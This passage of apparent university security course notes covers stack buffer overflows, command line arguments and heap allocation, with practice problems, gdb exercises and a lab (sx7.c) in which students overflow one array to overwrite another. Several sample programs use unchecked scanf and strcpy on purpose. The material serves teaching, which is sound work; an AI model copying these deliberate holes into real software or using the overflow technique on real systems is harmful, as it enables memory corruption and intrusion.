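    char *nl;
    int c;

    if (dst_size == 0 || fgets(dst, (int)dst_size, in) == NULL)
        return -1;
    nl = strchr(dst, '\n');
    if (nl != NULL) {                 /* whole line fit: drop the newline */
        *nl = '\0';
        return 0;
    }
    /* No newline stored: the line either filled the buffer exactly or was
     * longer.  The next character tells us which. */
    c = fgetc(in);
    if (c == '\n' || c == EOF)
        return 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                             /* discard what would have overflowed */
    dst[0] = '\0';
    return -1;
}

/* Helpers for stand-alone checks: does a typed value fit, and is a typed
 * line (constructed here as a string, not real keyboard input) accepted? */
int alpha_code_fits(const char *typed)
{
    char tmp[ALPHA_CODE_SIZE];
    return store_alpha_code(tmp, sizeof tmp, typed) == 0;
}

int accepts_typed_line(const char *typed_line)
{
    char alpha_code[ALPHA_CODE_SIZE];
    FILE *in = tmpfile();             /* standard C stand-in for the keyboard */
    int ok;

    if (in == NULL)
        return -1;
    fputs(typed_line, in);
    rewind(in);
    ok = read_alpha_code(alpha_code, sizeof alpha_code, in) == 0;
    fclose(in);
    return ok;
}

int main(void)
{
    char alpha_code[ALPHA_CODE_SIZE];

    printf("\nEnter your alpha code: ");
    if (read_alpha_code(alpha_code, sizeof alpha_code, stdin) != 0) {
        printf("\nAlpha codes are at most %d characters; try again.\n\n",
               ALPHA_CODE_SIZE - 1);
        return 1;
    }
    printf("\nYour alpha code is: %s\n\n", alpha_code);
    return 0;
}
```

Compiled with gcc -g and run, it behaves like happy_times for the entry 151234 but reports the sleepy midshipman's 25-character entry as too long instead of crashing. Compare read_alpha_code with the line scanf("%s", alpha_code): scanf is handed the address of the array but never its size, and the size is exactly the piece of information the check needs.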
Practice Problem 7.2
Describe the mechanism by which a segmentation fault occurs.
Solution:
2. A More Malicious Buffer Overflow Attack
2.1. The Buffer Overflow Attack on Steroids Our sleeping midshipman was not trying to do anything malicious—he just
fell asleep like all midshipmen do. But how could this fundamental problem with C described above be exploited to do
something truly evil?
Suppose I chose an alpha code that was not really an “alpha code”… heh, heh… but was instead a valid machine language
program.
So, now, the hacker has placed a program into memory:
But how can the hacker make use of this program?
Think about this: Suppose that when the hacker types in his executable code, he takes care to carefully overwrite the return
address, so that the four bytes that previously held the correct return address are changed to contain the address of
alpha_code! In this case, the return address is the address of the start of the evil program that the hacker has just placed in
memory!
Consider the effect of this action. When function happy_times is done, the "return address" will be placed in the eip
register. But the return address was adjusted to be the start of the executable program that has been surreptitiously placed in
memory. So, the hacker’s program will start executing.
In summary, the hacker has placed his own program in memory and made it execute. The hacker has executed a buffer overflow
attack.
When examining the potential for a buffer overflow, the programmer should consider how a function's variables are placed on
the stack. The first variable encountered is placed on the stack first, the second variable encountered is placed on the stack
next (above the first variable) and so forth.
Practice Problem 7.3
For the pawn function below, is it possible to overwrite the value you will get for your item with an amount of your choosing
by overwriting the value variable on the stack during the scanf( ) call below? Explain.
#include <stdio.h>
void pawn()
{
char item[12];
int value = 100;
printf("What have you come to sell? ");
scanf("%s", item);
}
int main()
{
pawn();
}
Solution:
Practice Problem 7.4
When the echo_string function is called in main from the following code sample, the stack pictured below is created.
#include<stdio.h>
void echo_string()
{
int count;
char entered_string[10];
printf("Enter a string: ");
scanf("%s", entered_string);
for(count=0; count < 10; count=count+1)
{
printf("%s\n",entered_string);
}
}
int main()
{
echo_string();
}
Assuming there is no padding (extra spaces) when the frame is created, how many characters can be entered before the return
address is overwritten?
Solution:
2.2. A Possible Solution: Don't Use C!
If this problem exists simply because C compilers do not check for going beyond the
bounds of an array, an easy way to solve this problem would be to avoid using the C
language altogether. In fact, more modern programming languages such as Java and C#
will not allow a programmer to run beyond the bounds of an array. Why not simply
abandon C and announce to the world: Problem Solved?
We cannot simply abandon C since too many C programs are in circulation. Moreover,
programmers would not want to abandon C even if a magic wand could suddenly convert
all C legacy code into Java programs! Recall from an earlier lecture that even today,
most programmers are programming in C and prefer to program in C.
The C programming language is very popular because it executes quickly and it provides the programmer with a high level of
control over the program. But with this power comes responsibility: Data integrity in C is the programmer's responsibility. If
the responsibility for data integrity were taken away from the programmer and given to the compiler instead, the compiler
would consistently and constantly check that we never run beyond the bounds of an array (which is good), but program
execution would be much slower (which is bad). Generally, users want their programs (whether they be operating systems,
office software, application programs or games) to execute quickly. C executes quickly since the compiler does not verify data
integrity. Yet, with the responsibility for data integrity resting on the programmer's shoulders, buffer overflow errors can occur
if the programmer is not careful.
A good analogy is provided by USNA instructor Nick Rosasco: C is like a workbench with saws and power tools and high-voltage drops and spinning lathes all out in the open, without safeguards and protections. For a master craftsman who knows
his job very well, this environment would be ideal for productive work, with the understanding that the craftsman has to be
responsible for his safety. For the novice, this environment would be very dangerous.
Conversely, a workbench that required the user to constantly interact with multi-level interlocked protection mechanisms and
cumbersome safety features would be much safer for the novice, but would drive the skilled craftsman insane. As with work
benches, so with programming languages: The intentional lack of safety in C translates into greater flexibility and improved
performance… and risk.
In order for you to write your own buffer overflow attacks, we have to add a little bit to your C repertoire. For now, we have
to cover command line arguments and the exit command. It’ll be fun.
3. More Fun with C
3.1. Command Line Arguments. Up to this point, we have written the first line of the function main as
int main()
However, main is a function that we can pass arguments to. As we already know, main is special, and passing arguments to
the main function also takes place in a special way.
The main function is more formally written as
int main (int argc, char *argv[])
The parameter argc contains the number of arguments passed to main and the variable argv is an array of strings with each
argument passed stored in one of the array locations.
First, let’s get a little bit comfortable with this notation. If we type in the following program:
#include <stdio.h>
int main( int argc, char *argv[] )
{
int i;
printf("Arguments to this program, on the command-line:\n");
for( i = 0; i < argc; i = i + 1 )
printf("%s\n", argv[i]);
}
then, when executing it we would see the output below:
Here is what is happening. When you execute a C program, the operating system counts the total number of separate items
entered, and places that integer in the variable argc. Each separate item you entered is placed, as a string, one-by-one, in the
array of strings argv.
So, if I was to type:
./a.out one 2 3.45 who?
Then:
argv[0]="./a.out"
argv[1]="one"
argv[2]="2"
argv[3]="3.45"
argv[4]="who?"
and what is the value of argc? The answer: 5.
Practice Problem 7.5
For the following program invocation:
midshipman@EC310 ~$ ./a.out wait 8 mate
(a) What is the value of argc?
(b) What is the value of argv[1]?
(c) What is the data type of argv[2]?
Solution: (a)
(b)
(c)
Practice Problem 7.6
Pertaining to taking in command line arguments for a program, choose the best description for argc .
(A) holds the number of command line arguments excluding the program name.
(B) holds the total number of command line arguments available to the program.
(C) holds the number of integer variables entered at the command line before the program begins.
(D) None of the above.
Solution:
Practice Problem 7.7
In the following sentence, circle the correct choices.
argv is a(n) array / index / stack used to store each command line parameter / index / argument in a binary / string /
numeric format.
Solution:
3.2. The exit statement. Sometimes we would like to intentionally terminate a program “gracefully” (instead of letting the
program crash and burn). This can be accomplished with an exit statement. When using the exit statement, we must add
the directive: #include<stdlib.h>. An example:
#include <stdio.h>
#include <stdlib.h>
int main()
{
float x, y;
printf( "This program divides x by y \n" );
printf( "Enter x and y: " );
scanf( "%f %f", &x, &y );
if( y == 0 )
{
printf( "Divide by 0!\n");
exit(1); // For us, it doesn't matter what number we use
}
else
{
printf( "x/y is %f\n" , x/y);
}
}
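A short program, added here as an example (it is not from the notes), that puts command line arguments and exit together: it refuses to touch argv[1] or argv[2] until argc proves they exist, and it converts the numeric argument out of its string form before using it. The program, its limit MAX_REPEAT and the function names are constructed for this example.

```c
/* Added example (not from the notes): checking argc before touching argv,
 * and turning an argument string into a number before trusting it.  The
 * program, limits and function names are constructed for this example. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_REPEAT 1000   /* constructed limit on how many greetings we print */

/* argc counts argv[0] (the program name) as well, so a program that needs
 * `wanted` arguments of its own must see argc == wanted + 1.  Returns 1 if
 * so, 0 otherwise; the caller exits before indexing argv past the end. */
int has_arguments(int argc, int wanted)
{
    return argc == wanted + 1;
}

/* Every argv element is a string, even "8".  Convert it with strtol and
 * reject anything that is not a whole decimal number from 1 to MAX_REPEAT:
 * "8x", "3.45", "-2", "0" and "" all fail.  Returns 0 and stores the value
 * in *out on success, -1 on failure (*out untouched). */
int parse_repeat_count(const char *text, long *out)
{
    char *end;
    long value;

    if (text == NULL || *text == '\0')
        return -1;
    errno = 0;
    value = strtol(text, &end, 10);
    if (errno != 0 || *end != '\0')        /* overflow, or trailing junk */
        return -1;
    if (value < 1 || value > MAX_REPEAT)
        return -1;
    *out = value;
    return 0;
}

/* Same check, returning `fallback` instead of an error code; convenient
 * for callers that only need the number. */
long repeat_count_or(const char *text, long fallback)
{
    long value;
    return parse_repeat_count(text, &value) == 0 ? value : fallback;
}

/* Usage: ./a.out <name> <count>   for example:  ./a.out midshipman 3 */
int main(int argc, char *argv[])
{
    long count, i;

    if (!has_arguments(argc, 2)) {
        fprintf(stderr, "usage: %s <name> <count>\n", argv[0]);
        exit(1);                       /* non-zero: the shell sees a failure */
    }
    if (parse_repeat_count(argv[2], &count) != 0) {
        fprintf(stderr, "count must be a whole number from 1 to %d, not \"%s\"\n",
                MAX_REPEAT, argv[2]);
        exit(2);                       /* a different code for a different error */
    }
    for (i = 0; i < count; i = i + 1)
        printf("Hello, %s!\n", argv[1]);
    return 0;                          /* zero: success */
}
```

Note that for the invocation ./a.out wait 8 mate from Practice Problem 7.5, argc is 4 and has_arguments(4, 3) is true, while ./a.out on its own gives argc 1 and the program exits before argv[1] is ever read. The exit codes 1 and 2 are arbitrary, as the notes say; what matters is that they are non-zero.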
Problems
1. What features of the C language make a buffer overflow attack possible?
2. Answer the following questions concerning how a program is stored in memory during its execution.
(a) Which segment of memory has contents that remain unchanged during program execution?
(b) Does the programmer have complete control over how the stack is organized?
(c) What is the relationship between the order in which variables appear in a function and the order in which
these same variables are stored in the function's stack frame?
(d) What important registers are used to define the boundaries of a stack frame?
(e) Suppose main calls a function named fun. After all the commands of fun have executed, how does the
program know to continue at the exact location in main where it left off?
(f) Is a source code file permitted to have more than one function?
(g) If your answer to (f) was "no", explain why that is the case. If your answer to (f) was "yes", explain how
the operating system knows where to begin executing your program if the source code file contains multiple
functions.
3. Segmentation Fault. Carefully enter the following program using nano. Notice that the program has no blank lines.
#include<stdio.h>
void happy_times( int x , int y )
{
char alpha_code[ 7 ];
printf("\nEnter your alpha code:" );
scanf( "%s" , alpha_code );
printf("\nYour alpha code is: %s\n\n", alpha_code );
}
int main( )
{
int a = 77;
int b = 21;
happy_times( a , b);
}
Execute the program entering just the numeric portion of your alpha code. You should see something like this:
Now, rerun the program entering a ridiculously long alpha code. You should see a segmentation fault:
Recall that a segmentation fault occurs if a program attempts to run beyond the boundaries of main memory that the
operating system has allotted the program. In this homework problem we will explore in depth the cause of this
segmentation fault.
Let's run our program (which I've named happy.c) by entering:
gcc -g happy.c
gdb -q ./a.out
set dis intel
list main
break 13
run
nexti
nexti
nexti
nexti
(Enter exactly four nexti's.)
If you now enter
i r eip
you should confirm that the next instruction that will execute is the instruction at address 0x8048419. If you now
enter
disass main
you should verify that the very next instruction is the function call. See the screen capture below.
The important point of all this is to note that you are still in main (but just barely!).
Recalling the generic picture of the stack, and noting that we have not yet arrived at the function call, the stack should
consist just of main's variables and the function's arguments.
(a)
Our goal is to locate main's variables and the function's arguments on the stack. Recall that main's variables (a and
b) will be stored in binary, which we can read as hexadecimal numbers. Convert the values of a and b to hexadecimal
and write these values below as eight hexadecimal digits (recall that integers are stored as four bytes, and four bytes
equates to eight hexadecimal digits) :
Note: For Parts (b) – (i) you will fill in the table which begins at the bottom of the next page.
(b)
Examine the value of the stack pointer ( i r esp ) and the base pointer ( i r ebp ). Fill in the values in the table
below, showing where the base pointer (label as EBP-main) and stack pointer (label as ESP-main) are pointing to.
(c)
Look at 40 bytes starting at the stack pointer by entering
x/40xb $esp
You should see 40 bytes displayed (screen capture not reproduced here). The first byte shown is the contents of memory
location 0xbffff800, the next is the contents of memory location 0xbffff801, the next is the contents of memory location
0xbffff802, and so on.
Locate main's variables and the function's arguments on the stack. Fill in the table, annotating the locations of these
four values. Label these as (main variable: a), (main variable: b), (function argument: x) and (function argument:
y).
(d)
Now enter
break 2
continue
nexti
The program is now at the point where the old value of the base pointer and the correct return address have been
placed on the stack.
What should be stored as the correct return address? (Hint: enter disass main and determine the address of the
next instruction after the function call.)
What should be the saved value of the base pointer?
(e)
Examine the value of the stack pointer ( i r esp ). Fill in the values in the table below, showing the stack pointer's
location (label as ESP-main-revised).
(f)
Look at 40 bytes starting at the stack pointer by entering
x/40xb $esp
Locate the saved value of the base pointer and the return address on the stack. Fill in the table, annotating the locations
of these two items. Label these as (saved base pointer) and (return address).
(g)
Now enter
break 8
continue
When prompted to enter your alpha code, enter: AAAAAA
Examine the value of the stack pointer ( i r esp ) and the base pointer ( i r ebp ). Fill in the values in the table
below, showing where the base pointer (label as EBP-happy_times) and stack pointer (label as ESP-happy_times)
are pointing to.
(h)
Locate your alpha code in the stack frame for happy_times. Do this by examining 40 bytes starting at the stack
pointer. Note that the capital letter A is equivalent to hexadecimal 0x41. Fill in the table, annotating the location of
the string alpha_code. Note that the NULL that terminates the string is part of the string.
(i)
Now, examine your memory drawing. How many characters would you have had to enter for your alpha code before
you start to overwrite the saved value of the base pointer (remember that the NULL is automatically added)?
Overwriting the saved value of the base pointer will (almost always) cause a segmentation fault, because the program
will attempt to restore the stack to a location in memory outside the region of main memory given to the program.
(j)
Exit the debugger (by entering quit) and run your program by entering ./a.out. Enter an alpha code of size equal
to the number of characters you calculated in part (i). Did you get a segmentation fault? (You should have!)
(k)
Enter an alpha code of size one less than the number of characters you calculated in part (i). Did you get a
segmentation fault? (You should not have.)
Table for Parts (b) to (i). Columns: Address, Value, Description. One row for each byte from address BFFFF7CD through
BFFFF81A (78 rows); fill in the Value and Description columns as you work through the parts above.
4.
Given the following code snippet:
char first_name[6] = "Alice";
strcpy(first_name, "Alexander");
(a) Will the C compiler state that there is an error?
(b) What potentially dangerous situation occurs because of the snippet above?
(c) What is the minimum size necessary for the array first_name to prevent this error?
(d) There are at least two ways to change the above code to prevent the above error from happening. Describe one.
5.
When the greetings function is called in main from the following code sample the stack pictured below is created.
#include<stdio.h>
void greetings()
{
int name_len = 15;
char name[name_len];
int year = 2014;
printf("Enter your name: ");
scanf("%s", name);
printf("Hello: %s! The current year is %d.\n", name, year);
}
int main()
{
greetings();
}
Stack figure (listed from top to bottom): year, name, name_len, prev_ebp, ret_addr
(a) Assuming there is no padding (extra spaces) when the frame is created, how many characters must the user enter
to overwrite only the first byte of the return address?
(b) Is it possible to change the value of year by performing a buffer overflow attack? Why or why not?
Security Exercise 7
Part 1. Initial Setup
Today you will use the program sx7.c which has been written for you and
placed in the ec310code directory.
Copy this file to the work directory by carefully entering the following at the
home directory prompt (make sure you are at your home directory!):
midshipman@EC310:~ $ cp ec310code/sx7.c work
Sidebar: "Most people give up just when they're about to achieve success. They quit on the one-yard line. They give up at
the last minute of the game, one foot from a winning touchdown. By the way…who am I?"
Verify that you have sx7.c in your work directory by changing to the work
directory:
cd work
and then listing the files in the work directory:
ls
If you do not have sx7.c in your work directory STOP and ask your
instructor or lab tech for help. Otherwise, proceed to Part 2.
Part 2. The Program
Use nano to examine the program sx7.c, which is also shown below:
#include<stdio.h>
#include<string.h>
#include <stdlib.h>
int main( int argc, char *argv[ ] )
{
char schoolone[ 5 ] ;
char schooltwo[ 5 ] ;
if( argc <= 2 )
exit(1);
strcpy( schoolone , argv[ 1 ] );
strcpy( schooltwo , argv[ 2 ] );
printf( "The best school is %s \n" , schoolone );
printf( "The second-best school is %s \n" , schooltwo );
}
Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using
gcc -g sx7.c
Before running your program, answer the following questions:
Question 1:
If I were to enter (but do not yet enter):
./a.out Army Navy
what would be the values of argc , argv[ 0 ], argv[ 1 ] and argv[ 2 ]?
Question 2:
If I were to enter (but do not yet enter):
./a.out
what would happen?
Now, run the program by entering:
./a.out
Make sure you understand the results.
Now run the program a second time by entering:
./a.out Army Navy
and again, make sure you understand what the program is doing.
If you do not understand the operation of the program, STOP and ask your instructor or lab tech for help. Otherwise, proceed
to Part 3.
Part 3. Your first experience at hacking!
Here is the background on this program: Your friend Cadet Lessheimer, who is attending USNA from the U.S. Military
Academy on an inter-service exchange program for the socially impaired, has written the program on the preceding page.
(Photo caption: “um… go army…??…” Cadet Lessheimer, USMA, Class of 2016)
He says: “Let’s run my program! I’ll enter the name of my school and then you, my dear midshipman friend, will enter the
name of your school, and then we’ll see which school the program says is Number 1.”
Since Cadet Lessheimer goes first, and always puts in Army, the string Army will be placed in argv[1]. Since the program
copies argv[1] into schoolone, and then announces that schoolone is the best school, the program is designed so that
it will always say:
The best school is Army
The second-best school is (whatever the midshipman entered)
As you can see, he is named Cadet Lessheimer for a reason.
YOUR MISSION: HACK THE CADET’S PROGRAM!
Your hack should work as follows: Cadet Lessheimer runs the program and enters Army
and then lets you enter your school. After you make your entry, the program prints out:
The best school is Navy
thus shocking the Cadet into a mind-numbing stupor.
Moreover, the output also provides an indication that the second best school is also Navy! Here is an example of how the
program's output might appear:
Note that you cannot make any changes to the C program!
So… how will you accomplish this? By designing a buffer overflow! (really… you will!)
Enter the following commands:
gcc -g sx7.c
gdb –q ./a.out
set dis intel
list
<Enter>
(Note that the reason for the second <Enter> above is to display the full program. Entering list will only display the first
ten lines of the program.)
Here is what you would like to accomplish: You want to examine the stack while the program is running, and determine if you
can overwrite the cadet's entry by using a buffer overflow. Looking at the program listing, we see:
STEP 1: Determine the proper breakpoint for your program.
You want the program to run up to a certain point, then freeze at a breakpoint, allowing you to examine the stack. Where
should you set the breakpoint? Looking at the figure above, setting the breakpoint at line 2 would clearly be worthless, since
nothing significant has occurred by that line of the program. You want to set the breakpoint to be at a point after the command
line arguments (i.e., the cadet's entry which is Army, and your entry) are on the stack.
Question 3:
Where should you set the breakpoint?
STOP and show your instructor or lab tech your answer to Question 3. With their okay, proceed to Step 2 below.
STEP 2: Run to the breakpoint and examine the stack.
To enter a breakpoint for a program that requires command line arguments (where, let’s say, the command line arguments are
Army and Navy), you would enter:
break <whatever number you have for Question 3>
run Army Navy
For example, if you answered Question 3 by deciding the breakpoint should be at line 4, you would enter:
break 4
run Army Navy
Now, examine the stack by entering
i r esp
i r ebp
Question 4:
How many bytes are on the stack?
Examine the stack by entering:
x/60xb $esp
Question 5:
Label, in the Description column, the locations of the addresses to which main's stack and base
pointer point. Label the base pointer as EBP-main and the stack pointer as ESP-main.
Question 6:
Locate on the stack the location of where the two command line arguments are stored. Recall that
the program copies argv[1] into schoolone and argv[2] into schooltwo. Show these on
the table below, labeling them as schoolone – cadet's entry and as schooltwo – midshipman's entry.
STEP 3: Determine the attack technique.
Question 7:
Based on your picture of the stack, which is true (a or b):
(a) If schoolone is long enough, it can overwrite schooltwo
(b) If schooltwo is long enough, it can overwrite schoolone
Question 8:
Based on your picture of the stack, design your buffer overflow. Write a clear explanation of how
your attack works in the answer space for Question 8.
Question 9:
Demonstrate your buffer overflow attack during a run of the program. Your instructor or lab tech
will sign off on this.
Security Exercise 7 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5 and Question 6:
Table for Questions 5 and 6. Columns: Address, Value, Description. One row for each byte from address BFFFF7CD through
BFFFF81A (78 rows); fill in the Value and Description columns.
Question 7:
Question 8:
Question 9: When you have successfully hacked the cadet's program, show your instructor or Lab tech. Your instructor/tech
will sign your answer sheet.
_________________________________
Instructor or Lab Tech signature
Chapter 8: The Heap
Objectives:
(a) Explain the purpose of the heap and describe how memory on the heap is allocated.
1. The Heap
1.1 Introduction. We mentioned a few chapters back the fact that when a program is to be executed, the OS reserves a block
of main memory for the program’s use. This block of memory is then partitioned into segments.
The “text” segment holds the actual program (the machine language instructions which we can view as assembly-language
instructions.) The “stack” segment is the memory that the program has available to store information during execution. For
example, the program’s variables are stored on the stack.
The above picture is full and complete for the programs that we have dealt with up to this point. But the above picture is
lacking as a full description for more general programs.
Once a C program is compiled and the corresponding machine code generated, the amount of space for the text segment is
fixed. Similarly, the compiler knows about all variables that we declare in our program, so the compiler can make room for
these variables on the stack as soon as the function that uses these variables is invoked. The precise placement of data on the
stack is completely controlled by the compiler.
Oftentimes when we run a program, we will want to use memory that cannot be anticipated in advance by the compiler (if the
compiler had anticipated it, it would have reserved space for it on the stack). For example, suppose we want our program to
use an array of characters, but the size of the array is a value that the user will enter at the keyboard while the program is
running. The compiler cannot, in advance, predict the size of the array, since the size will depend on whatever value the user
happens to enter.
So, we need an additional segment of memory available for the programmer to directly control. This additional segment is
called the heap. The heap, like the stack, varies in size—it will grow and shrink based on the memory needs of the user as the
program is running. The heap and the stack, in fact, grow towards each other.
Note that the total space allocated for the heap and the stack is fixed so, in a sense, the heap and the stack compete with each
other for space. As items are added to the heap, the size of the heap grows and the "bottom of the heap" moves to a higher
memory address. As items are added to the stack, the size of the stack grows and the "top of the stack" moves to a lower
memory address.
Practice Problem 8.1
Consider the picture above, showing program 1 in memory.
(a) How does the CPU keep track of the program's proper location within the text segment?
(b) How does the CPU keep track of where the stack is located in main memory?
Solution: (a)
(b)
1.2 Heap Allocation. The preceding question might leave you wondering: How does the CPU keep track of where the heap
is located in main memory? The answer to this question is: It doesn't. It is up to the programmer to keep track of the heap.
The point bears repeating: The compiler takes care of the stack, YOU (the programmer) must take care of the heap.
To allocate memory on the heap, we use the malloc function. We tell the malloc function the number and type of the
space we need (e.g., “space for 6 integers” or “space for 25 characters”) and malloc returns a pointer to the start of the
memory that is allocated on the heap for this purpose.
For example, to allocate space for 6 integers (which requires 24 bytes), we would use:
int *ptr1 ;
ptr1 = (int *) malloc(24) ;
After these two lines of code execute, ptr1 will hold the address of the space on the heap for six integers. Note that the argument
to the malloc function is the number of bytes we would like to allocate on the heap. (malloc is declared in stdlib.h, so a
program that uses it needs #include <stdlib.h>.)
Practice Problem 8.2
Write a snippet of C code that will allocate space on the heap for 25 characters.
Solution:
Practice Problem 8.3
Which segment of memory is physically highest (i.e., has the smallest addresses)?
(a) Heap
(b) Stack
(c) Text Segment
(d) Registers
Solution:
Practice Problem 8.4
In which direction does the heap grow?
(a) From the bottom (larger memory address) up (to a smaller memory address).
(b) From the top (smaller memory address) down (to a larger memory address).
(c) It depends on the corresponding number and types of variables currently allocated on the stack.
(d) It depends on the prolonged effects of solar and liquescent additives combined with the chemical makeup of the
heap.
Solution:
This whole notion of using the heap may seem mysterious, so let's look in gory detail at an example. Our goal is to write a
program that accepts, as command line arguments, a number of bytes to allocate on the heap (to hold character data), and a text
string to place in that newly allocated memory.
For example, if we executed our program (./a.out) with command line arguments as shown:
midshipman@EC310-VM:~ $ ./a.out 10 cyber2
the program would allocate 10 bytes on the heap, store the characters "cyber2" at this location, and output a message telling
us the starting address for our 10 byte allocation (the address that will contain the c in "cyber2").
Here is the program to accomplish this. We will examine the program line-by-line.
 1  #include<stdio.h>
 2  #include<string.h>
 3  #include<stdlib.h>          /* declares atoi, malloc and free */
 4  int main( int argc , char *argv[ ] )
 5  {
 6      char *ptr ;
 7
 8      int size;
 9
10      size = atoi( argv[ 1 ] ) ;
11
12      ptr = ( char* ) malloc( size );
13
14      strcpy( ptr , argv[ 2 ] );
15
16      printf("\nThe following is stored on the heap at address %p:", ptr);
17
18      printf( "%s \n\n" , ptr );
19
20      free( ptr ) ;
21  }
(What in blazes is atoi on line 10? Do not fear! All will be explained below!)
Practice Problem 8.5
When we run the program above by entering: ./a.out 10 cyber2
(a) What is the value of argc?
(b) What are the values of argv[ 1 ] and argv[ 2 ] ?
(c) What are the types of argv[ 1 ] and argv[ 2 ] ?
Solution:
(a)
(b)
(c)
On line 6 we declare a pointer to a character named ptr. Our intent (as we will soon see) is that ptr will point to the first
character in a string of characters.
On line 8 we declare an integer named size, and then on line 10 we set size to be equal to the integer value of argv[1].
Recall that the intent of the second command line argument, argv[ 1 ], is to specify the number of bytes that we wish to
reserve on the heap. We want to reserve 10 bytes on the heap, so we typed in 10 as the second command line argument. It is
important to remember, though, that all command line arguments are stored as strings. So we have to convert argv[1] to an
integer. You can convert a string to an integer using the function atoi (which stands for ASCII to integer).
Line 12 then reserves 10 bytes on the heap, and stores the starting address of the first byte in ptr. At this point, the program's
memory is as follows:
Line 14 then copies the string argv[2] into the memory starting at ptr. After line 14, the program's memory looks as
follows:
On lines 16 and 18 we print out the address on the heap where argv[2] was copied, followed by the string itself. Here is the output:
So we can refine the picture of this program in memory:
There is one last (important!) point about the heap. If our program no longer needs memory that was allocated on the heap, it
should free it up so that it can be reused. This is done with the free function. For example, to free the heap memory in the
prior program, we would use the line of code:
free( ptr ) ;
So, our final program includes line 20.
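As an added example (not code from the EC310 notes), here is the same heap program with its inputs checked before anything is copied: the size is parsed with strtol instead of atoi so that garbage, zero or a negative number is refused, and argv[2] is copied only when it, plus its terminating NULL, fits in the allocation. The function names and result codes are this example's own.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not code from the EC310 notes. The chapter's program does
 *     size = atoi(argv[1]); ptr = malloc(size); strcpy(ptr, argv[2]);
 * with no checks, so a size smaller than the text makes strcpy write past
 * the end of the heap allocation. This version refuses such input. */

/* Result codes (names are this example's own). */
enum { STORE_OK = 0, STORE_BAD_SIZE = 1, STORE_TOO_LONG = 2, STORE_NO_MEMORY = 3 };

/* Parse a decimal byte count, but unlike atoi reject garbage, trailing
 * characters, zero, negative numbers and values that do not fit in an int. */
static int parse_size(const char *text, int *out)
{
    char *end = NULL;
    errno = 0;
    long value = strtol(text, &end, 10);
    if (errno != 0 || end == text || *end != '\0' || value <= 0 || value > INT_MAX)
        return 0;
    *out = (int)value;
    return 1;
}

/* Allocate size_arg bytes on the heap and copy text into them, but only if
 * the text plus its terminating NULL fits. On success *out points to the
 * heap copy, which the caller must free; otherwise *out is NULL. */
int store_on_heap(const char *size_arg, const char *text, char **out)
{
    int size;
    *out = NULL;
    if (!parse_size(size_arg, &size))
        return STORE_BAD_SIZE;
    size_t len = strlen(text);          /* argv strings are always NULL-terminated */
    if (len + 1 > (size_t)size)         /* need room for the NULL as well */
        return STORE_TOO_LONG;
    char *ptr = malloc((size_t)size);
    if (ptr == NULL)
        return STORE_NO_MEMORY;
    memcpy(ptr, text, len + 1);         /* len + 1 copies the NULL terminator too */
    *out = ptr;
    return STORE_OK;
}

/* Convenience wrapper: run store_on_heap, free what it allocated, and report
 * only the result code (-1 if a copy was made that does not match text). */
int store_result(const char *size_arg, const char *text)
{
    char *ptr;
    int rc = store_on_heap(size_arg, text, &ptr);
    if (rc == STORE_OK && strcmp(ptr, text) != 0)
        rc = -1;
    free(ptr);                          /* free(NULL) is harmless */
    return rc;
}

int main(int argc, char *argv[])
{
    char *ptr;
    if (argc != 3) {
        fprintf(stderr, "usage: %s <bytes> <text>\n", argv[0]);
        return 1;
    }
    int rc = store_on_heap(argv[1], argv[2], &ptr);
    if (rc != STORE_OK) {
        fprintf(stderr, "Refused: result code %d\n", rc);
        return 1;
    }
    printf("\nThe following is stored on the heap at address %p:", (void *)ptr);
    printf("%s \n\n", ptr);
    free(ptr);
    return 0;
}
```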
Practice Problem 8.6
Suppose we run the program shown above with the debugger, and set a breakpoint at line 16. Which of the following is a
possible value stored in the instruction pointer eip?
(a) 0x0804848c
(b) 0xbffff810
(c) 0x0804a010
Solution:
Practice Problem 8.7
Suppose we run the program shown above with the debugger, and set a breakpoint at line 16. Which of the following is a
possible address for where the variable size is stored?
(a) 0x0804848c
(b) 0xbffff810
(c) 0x0804a010
Solution:
Practice Problem 8.8
The above picture of the stack shows that the variable size is stored "above" (i.e., at lower memory) than ptr. How do we
know that this must be the case?
Solution:
For this chapter's security exercise, we have to add a little bit to your C repertoire. For now, we have to cover the string
compare command and the syntax for passing an array as an argument to a function. It’ll be fun.
2. More Fun with C
2.1. A new string command Recall earlier that we were able to enter or change the value of strings using the strcpy
command. Specifically, the command
strcpy( s1 , s2 );
copies the string s2 to the string s1. Another useful command is the string compare command, strcmp. The command
value = strcmp( s1 , s2 );
compares the strings s1 and s2 character by character. The function returns an integer greater than zero if s1 > s2 and
returns an integer less than zero if s1 < s2. Perhaps most importantly, the function returns zero if the two strings are equal
(i.e., identical). To use these functions, you must have the preprocessor directive:
#include <string.h>
Practice Problem 8.9
What is the output of the following program?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
    char string1[ ] = "Happy" ;
    char string2[ ] = "Joyous" ;
    char string3[ ] = "Happy Times" ;
    char string4[ ] = "Happy" ;
    if(strcmp( string1 , string2 ) == 0)
        printf("\n String 1 and String 2 match\n");
    else
        printf("\nString 1 and String 2 do NOT match\n");
    if(strcmp( string1 , string3 ) == 0)
        printf("\nString 1 and String 3 match\n");
    else
        printf("\nString 1 and String 3 do NOT match\n");
    if(strcmp( string1 , string4 ) == 0)
        printf("\nString 1 and String 4 match\n\n");
    else
        printf("\nString 1 and String 4 do NOT match\n");
}
Solution:
2.2. Passing an array to a function To pass an array to a function we use the array name as an argument. In the function
header, though, the type must be a pointer, since an array name is an address.
For example, suppose we had a string (an array of characters) declared as
char name[ 10 ];
and we wanted to pass this array (as the only argument) to a void function named fun. Then the function call would be
fun( name );
and the first line of the function definition would be
void fun( char *input )
Thus, the argument (name) is passed to a parameter (input) which is a pointer to an array of characters.
Problems
1. Suppose I have a C source-code file midshipman.c that creates a pointer to a character buffer as follows to store
each student's alpha code:
char *alpha_ptr;
(a) What must I type to allocate 20 bytes on the heap for this string?
(b) After the midshipman graduates and this string is no longer needed, what instruction would a responsible
programmer include at the end of the program?
(c) Why is it a good idea to include the instruction that you noted in question (b) above?
2. Your friend is writing a program that takes two command line arguments (aside from ./a.out). The idea behind
the program is that the user is to provide the number of bytes to allocate on the heap, and a string to place on the heap.
For example, if the user enters
./a.out 100 cyber2
